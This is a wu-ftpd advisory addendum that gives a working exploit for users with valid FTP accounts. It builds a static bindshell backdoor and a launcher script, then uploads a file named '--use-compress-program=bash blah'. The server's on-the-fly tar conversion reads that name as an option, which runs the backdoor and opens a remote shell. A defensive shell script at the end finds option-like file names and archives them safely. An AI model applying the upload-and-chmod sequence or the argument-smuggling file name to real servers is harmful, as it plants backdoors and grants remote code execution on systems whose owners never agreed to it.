SUID Advisory #1 Addendum - Insecure FTP server conventions can lead to remote binary execution on a remote ftp server. Anonymous users or users with valid ftp access only accounts may also execute arbitrary code. Exploit information included.
suid@suid.kg - an addendum to wu-ftpd configuration vulnerability exploit information
Background:
In the initial advisory I mentioned that users with valid ftp access only accounts may also
execute arbitrary code. I did not, however, include exploit information for this. This information is
now found below.
Exploit Information:
With only a valid FTP account on the server, the difficulty goes right down. You also have the added
benefit of not being stuck in a chroot() environment at the end. Local exploit time.
The exploit goes along much the same lines as the anonymous FTP exploit does:
Create a backdoor, using bindshell from our previous example:
$ gcc bindshell.c -o b -static
If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can
use the following script example. Create a script to exec the desired commands:
$ cat > blah
#!/bin/bash
./b &
^D
Now create an empty file named "--use-compress-program=bash blah":
$ > "--use-compress-program=bash blah"
FTP to your target and log in with your username/password. Upload your 3 files:
ftp> put b
ftp> put blah
ftp> put "--use-compress-program=bash blah"
Do a SITE CHMOD for b and blah:
ftp> quote SITE CHMOD 0755 b
ftp> quote SITE CHMOD 0755 blah
Now get your file:
ftp> get "--use-compress-program=bash blah".tar
That's all there is to it. You should now have a shell on whatever port you specified.
Merry Christmas!
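
The steps above depend on a file name that begins with "--" reaching tar as if it were an option. The following is an added defensive example, not code from the advisory or from wu-ftpd: it audits a directory tree for option-like names and archives a user-supplied name as data only. The function names and the sample file name are constructed for illustration, and it assumes the server builds the archive by running tar on the requested name.

```shell
#!/bin/sh
# Added defensive example (not from the advisory).
# Function names and the sample file name are constructed for illustration.

# List every entry under directory $1 whose base name starts with "-".
# Such names are parsed as options by any tool that receives them unescaped.
find_optionlike() {
    find "$1" -name '-*' -print
}

# Return a form of a relative name that can never be parsed as an option.
safe_operand() {
    case "$1" in
        -*) printf './%s\n' "$1" ;;
        *)  printf '%s\n' "$1" ;;
    esac
}

# Write a tar archive of name $2 (relative to directory $1) to stdout.
# "--" ends option parsing; the "./" prefix is a second safeguard for
# tools that do not honour "--".
archive_name() {
    ( cd "$1" && tar -cf - -- "$(safe_operand "$2")" )
}

# Demo on a constructed tree: one option-like name, one ordinary name.
demo() {
    demo_root=$(mktemp -d) || return 1
    : > "$demo_root/--constructed-flag=x y"
    : > "$demo_root/readme.txt"
    echo "option-like names found:"
    find_optionlike "$demo_root"
    echo "archive members when the name is passed as data:"
    archive_name "$demo_root" "--constructed-flag=x y" | tar -tf -
    rm -rf "$demo_root"
}
demo
```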